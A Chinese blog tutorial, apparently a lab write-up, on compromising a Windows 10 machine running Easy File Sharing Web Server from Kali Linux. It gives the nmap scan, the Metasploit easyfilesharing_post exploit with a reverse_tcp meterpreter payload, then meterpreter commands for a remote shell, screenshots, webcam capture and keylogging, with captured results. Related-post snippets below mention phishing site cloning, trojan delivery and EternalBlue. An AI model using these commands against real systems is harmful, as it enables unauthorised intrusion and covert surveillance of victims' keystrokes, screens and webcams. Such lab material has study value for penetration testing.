kali攻击命令大全_利用msf攻击win10

最新推荐文章于 2024-06-03 02:20:11 发布
最新推荐文章于 2024-06-03 02:20:11 发布
阅读量1.4w 收藏 151
点赞数 26
文章标签: kali攻击命令大全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35513543/article/details/112076262
版权

攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing

注意点: 攻击者的虚拟机网络模式应选择桥接模式。

准备工作完成,可以开始内网渗透之旅了。

step-1

首先我们先用nmap扫描一下靶机开了哪些服务root@kali:~# nmap -sV 10.3.37.56

0f52ad8300904b7d61a48b5b47717852.png

namp扫描结果

我们可以看到80端口和443端口开放了,对应的是Easy File Sharing Web Server,满足EasyFileSharing漏洞攻击,进入下一步。

step-2

打开msf控制台,设置攻击参数

root@kali:~# msfconsole              #进入控制台,稍微等一下msf > search EasyFileSharing         #查找我们要用的漏洞
b64926842c2aafd526ed103a2dabe5fb.png

搜索结果

我们选择最新的一个,2017-06-12的版本,并设置payload。

msf > use exploit/windows/http/easyfilesharing_post    #使用这个漏洞msf exploit(windows/http/easyfilesharing_post) > set payload windows/meterpreter/reverse_tcp   #设置攻击payload

我们用show options看一下需要什么攻击参数

msf exploit(windows/http/easyfilesharing_post) > show options
5c022abd4e07ce852fef80c710412cbf.png

设置参数

根据Required属性看一下哪些是需要配置的,其中一些是配置好的,我们只需将其他的配置好就ok了。

msf exploit(windows/http/easyfilesharing_post) > set lhost 10.3.134.27   #设置本地ipmsf exploit(windows/http/easyfilesharing_post) > set rhost 10.3.37.56    #设置远程ip

参数都配置好了,接着就是激动人心的exploit了。

msf exploit(windows/http/easyfilesharing_post) > exploit   #攻击
111b4ad88848c6f1c1e3151c6dad715d.png

显示这个页面,说明你成功了

逐个输入以下命令,试试

meterpreter > getuid          #获取靶机uidmeterpreter > shell           #进入靶机shellmeterpreter > screenshot      #靶机截屏meterpreter > webcam_snap     #用靶机摄像头拍照meterpreter > webcam_stream   #用靶机摄像头录像meterpreter > keyscan_start   #开启键盘记录meterpreter > keyscan_dump    #捕获键盘记录meterpreter > keyscan_stop    #停止键盘记录

我们来测试几个好玩的1st.捕捉靶机键盘记录

a463504d053281cfeb39a419caee5c57.png

捕捉到靶机键盘记录(hack hack)

2nd.捕捉靶机截屏

ee2abb124deb3f10ffc2a4c6d1203c58.png

捕捉靶机截屏

416335bbce93e7ec5becb99fe762ad53.png

捕捉靶机截屏

3rd.用靶机摄像头拍照

7bc26380542be9ab8139c46a37760e86.png

利用靶机摄像头拍照

fede60236fdf7d6eca6c026f59578d1f.png

靶机摄像头像素略渣,不过看看我们的公教区学习环境吧

小结:

我们做攻击实验都是在环境都配置好的情况下,现实生活中不会有这么好的肉鸡。而且网络攻击属于违法行为,人生路漫漫,且行且珍惜

毛琳Michael
关注
  • 26
    点赞
  • 151
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 3358
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
msf5 自动攻击模块 db_autopwn
07-10
**msf5 自动攻击模块 db_autopwn 知识点详解** `db_autopwn`是Metasploit Framework(msf5)中的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块在安全审计和渗透测试过程中扮演...
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4693
win10系统攻击msf
Kali MSF攻击Win10
nlj1860453的博客
01-05 1205
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
kalikali常见攻击手段
最新发布
2403_83442903的博客
06-03 244
至此,后门植入成功!它通常被用来伪造邮件,进行钓鱼、社工等操作。如果想克隆指定的页面的话,就选择2站点克隆,当然,这个功能虽然强大,但是有的网站是无法克隆的,如果无法克隆,就选择3,自己制作一样的网站去钓鱼。我们将账号和密码都设为admin,点击登陆,发现有跳转到了真正的页面,也不会返回账号信息错误的界面,同时,kali也将我们输入的信息截获了,并在终端显示。通常是应用层攻击攻击对象是网页,涉及的协议主要是HTTP,HTTPS,消耗的是服务器的CPU资源(通过请求大量调用CPU的资源,例如查询数据库)
Kali Linux DDos攻击、CC攻击、ARP攻击
qq_61901169的博客
06-03 2268
注:Kali官网下载可以直接打开的2023版本的虚拟机无法运行。
Kali常见攻击手段_kali攻击
分享Python知识
11-17 3481
Kali常见攻击手段_kali攻击
通过msf渗透win10
qq_63651088的博客
03-22 1496
提前将kali设置成桥接模式,与win10在同一个网段下。将payload.exe文件发送至win10下。还有更多利用方式,可自行探索。
Kali Linux命令大全.pdf
08-20
kali linux命令大全
Msf攻击Win7
07-09
Msf攻击Win7】指的是使用Metasploit框架对Windows 7系统进行渗透测试或漏洞利用的过程。Metasploit是一款开源的安全漏洞检测工具,广泛应用于安全研究、渗透测试和教育领域。它包含了大量的exploits(漏洞利用代码...
Kali_Linux_中间人站攻击.pdf
01-14
并顺利执行,则相当于黑客直接拿到了Webshell 4、一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 5、SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击...
ensp加kali实现arp欺骗攻击
04-21
在网络安全领域,ARP欺骗是一种常见的攻击手段,它利用了局域网中地址解析协议(ARP)的缺陷。本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网...
黑客自学(网络安全网络渗透攻击)kail黑客系统操作命令大全
互联网知识分享
08-11 799
这些操作命令和工具可以帮助黑客进行系统信息收集、文件和目录操作、系统管理、网络操作、端口扫描、漏洞扫描和利用、数据包分析、加密和解密、系统和网络安全、社会工程学、密码破解、数据库安全、网站安全、无线网络安全、逆向工程、命令注入、攻击、匿名和隐私保护、社交工具、信息收集、威胁情报、漏洞管理、密码管理、安全编程、威胁建模、恶意软件分析、反病毒软件、漏洞修复、安全日志管理、安全意识培训、威胁情报共享、渗透测试报告、代码审计、安全框架、安全策略、安全审计、安全风险评估、安全意识和安全升级等方面的操作。
kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成)
热门推荐
m0_50818626的博客
04-17 1万+
平台及工具: linux:kali平台 aircrack - ng 工具 免驱监听网卡 详细操作 1.首先启动kali,插入网卡,输入ifconfig查看kali是否检测到监听网卡,注意监听网卡要免驱动的。 ifconfig //查看自身网卡信息 如图,看到wlan0就代表kali成功检测到监听网卡啦。 2.在启动网卡的监听模式之前一定要杀死进程,否则将会监听不到附近的WiFi,执行下面命令杀死进程。 airmon-ng check kill //杀死有关进程 3
永恒之黑渗透win10
yy1024iy的博客
05-30 2067
这篇文章介绍了一种名为永恒之黑的高级网络攻击工具,它利用微软Windows系统漏洞实现远程控制、篡改和窃取数据。文章详细描述了在攻击Win10计算机中使用永恒之黑的操作步骤。与常规渗透攻击相比,永恒之黑更加难以防御,这也让用户在保护自己计算机安全时需要更重视网络安全并定期更新系统和软件。
kali-密码攻击】(5.1.2)密码在线破解:Medusa
08-09 3593
kali-密码攻击】密码在线破解:Medusa
kali的常用命令
jdk12123的博客
06-14 4290
passwd 修改密码passwd root 修改root用户密码date 显示系统日期sudo 后面加命令 就可以调用管理权限apt-get update 更新软件列表这个命令,会访问源列表里的每个网址,并读取软件列表,然后保存在本地电脑。我们在新立得软件包管理器里看到的软件列表,都是通过update命令更新的。apt-get upgrade 更新软件这个命令,会把本地已安装的软件,与刚下载的软件列表里对应软件进行对比,如果发现已安装的软件版本太低,就会提示你更新。
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3846
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
Kali Linux 的常用命令
Welcome To Myon'Blog !
03-12 9328
Kali Linux 的常用命令 1、与文件目录相关的命令 2、文件查看命令 3、网络相关命令 4、进程控制命令 其他常用命令 hosts文件 脚本编写
kali使用msf攻击win xp错误
05-18
很遗憾,您提供的信息太少了,我无法确定您遇到了什么错误。但是,通常在使用Metasploit Framework(MSF攻击Windows XP时可能会出现各种错误。这可能涉及到网络连接问题、操作系统配置问题、MSF模块问题或其他问题。以下是您可能要考虑的一些常见问题和解决方法: 1. 确保Windows XP系统已经被漏洞利用程序所支持,并且系统已经被正确地配置,以便接受连接。 2. 确保你的Kali机器和Windows XP系统在同一网络中,并且能够相互通信。 3. 确保你的MSF版本是最新的,并且所有需要的模块都已经安装。 4. 确保你的payload是正确的,并且已经正确地配置。 5. 如果你遇到了错误,请先试着查看MSF的日志文件,以便确定错误的原因。 希望这些信息对您有所帮助。如果您需要更多的帮助,请提供更多的详细信息,我会尽力回答您的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值